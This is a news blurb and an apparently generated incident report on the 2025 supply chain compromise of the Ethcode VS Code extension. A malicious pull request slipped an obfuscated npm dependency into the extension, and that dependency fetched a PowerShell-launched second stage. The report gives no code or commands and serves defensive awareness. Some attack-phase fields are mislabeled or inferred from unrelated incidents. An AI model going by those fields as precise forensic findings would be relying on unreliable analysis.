Full Report
Cybersecurity researchers have flagged a supply chain attack targeting a Microsoft Visual Studio Code (VS Code) extension called Ethcode that has been installed a little over 6,000 times. The compromise, per ReversingLabs, occurred via a GitHub pull request that was opened by a user named Airez299 on June 17, 2025. First released by 7finney in 2022, Ethcode is a VS Code extension that's used to
Analysis Summary
# Incident Report: VS Code Extension Supply Chain Compromise (Ethcode)
## Executive Summary
A supply chain attack successfully compromised the Microsoft Visual Studio Code extension "Ethcode," which is used for deploying Solidity smart contracts on EVM-based blockchains. The compromise occurred through a malicious pull request opened by a throwaway GitHub account, injecting a malicious npm dependency that downloads a second-stage payload, likely aimed at stealing cryptocurrency assets or sabotaging contracts. The incident was detected by Microsoft, leading to the extension's removal, and subsequently restored after the malicious dependency was purged.
## Incident Details
- **Discovery Date:** Approximately June/July 2025 (Implied after malicious PR on June 17 and subsequent removal before June 28).
- **Incident Date:** Initial malicious commit on June 17, 2025.
- **Affected Organization:** Project maintainers of the Ethcode VS Code extension (Owner: 7finney).
- **Sector:** Software Development Tools / Cryptocurrency Development.
- **Geography:** Global (Affecting users via VS Code Marketplace and GitHub).
## Timeline of Events
### Initial Access
- **Date/Time:** June 17, 2025
- **Vector:** Compromise of the GitHub repository maintainer's trust via a Malicious Pull Request (Supply Chain Attack).
- **Details:** User 'Airez299' (created the same day as the PR) submitted a pull request falsely claiming to "Modernize codebase with viem integration." This PR included approximately 43 commits and 4,000 lines of change, hiding malicious introductions.
### Lateral Movement
- **Details:** Lateral movement was achieved by injecting a malicious dependency (`keythereum-utils`) into the project's `package.json`. Upon installation by end-users, the obfuscated dependency executed code to spawn a hidden PowerShell process that downloaded and ran a second-stage batch script from a public file-hosting service.
### Data Exfiltration/Impact
- **Details:** The exact nature of the final payload is unknown, but it is believed to be malware capable of either stealing cryptocurrency assets or poisoning the smart contracts being developed by users of the extension.
### Detection & Response
- **Details:** Microsoft detected the malicious dependency and subsequently removed the Ethcode extension from the VS Code Extensions Marketplace. A project maintainer submitted a pull request on June 28, 2025, to formally remove the malicious dependency. The extension has since been reinstated following remediation.
## Attack Methodology
- **Initial Access:** Contributor takeover/Repository compromise via malicious Pull Request.
- **Persistence:** Injection of a malicious npm package (`keythereum-utils`) as a dependency.
- **Privilege Escalation:** Not explicitly detailed, but the execution of PowerShell via a batch script hints at system-level execution capabilities derived from the extension's runtime environment.
- **Defense Evasion:** Heavy obfuscation of the `keythereum-utils` code.
- **Credential Access:** Implied goal, likely targeting private keys or tokens related to EVM development.
- **Discovery:** Not specified beyond the immediate execution path.
- **Lateral Movement:** N/A (Focus was payload delivery within the developer environment).
- **Collection:** Downloading and executing a second-stage payload via PowerShell/batch script.
- **Exfiltration:** Implied exfiltration of cryptocurrency assets or sensitive development material.
- **Impact:** Potential financial loss (crypto theft) and corruption of source code/contracts.
## Impact Assessment
- **Financial:** Potential for cryptocurrency theft or loss associated with compromised developer accounts/wallets.
- **Data Breach:** Sensitive keys, API tokens, or proprietary smart contract code deployed by 6,000+ installing users.
- **Operational:** Minor disruption to developer workflows during the time the extension was unpublished from the marketplace.
- **Reputational:** Damage to the reputation of the Ethcode project and increased scrutiny on the security of EVM development tooling.
## Indicators of Compromise
- **Network Indicators (Defanged):** Communication with infrastructure hosted behind Cloudflare-protected domains (based on contextual information regarding similar supply chain attacks).
- **File Indicators:** Malicious package named `keythereum-utils` uploaded to npm by users 0xlab, 0xlabss, and 1xlab.
- **Behavioral Indicators:** Execution chains involving hidden PowerShell processes triggered by compromised NPM dependency execution flow.
## Response Actions
- **Containment:** Microsoft removed the Ethcode package from the VS Code Extensions Marketplace.
- **Eradication:** Project maintainers formally purged the dependency on the malicious `keythereum-utils` package.
- **Recovery:** The legitimate version of the Ethcode extension was reinstated to the marketplace after verification.
## Lessons Learned
- **Developer Trust Exploitation:** Attackers successfully exploited the implicit trust within the open-source contribution model (GitHub PRs) to introduce malicious code under the guise of legitimate maintenance.
- **Indicator of New Account Activity:** The creation of a throwaway GitHub account on the exact day of the malicious commit should have been a significant red flag.
- **Escalating Threat:** This incident highlights the increasing sophistication of supply chain attacks targeting developer tooling environments to harvest secrets or sabotage applications.
## Recommendations
- Harden review processes for external contributions, especially for projects that have been dormant for long periods.
- Implement strict dependency vetting and utilize automated scanning tools to check for obfuscated code or suspicious behavior in newly added npm dependencies before merging pull requests.
- For cryptocurrency developers, strictly separate development environments used for signing transactions from general browsing/development machines.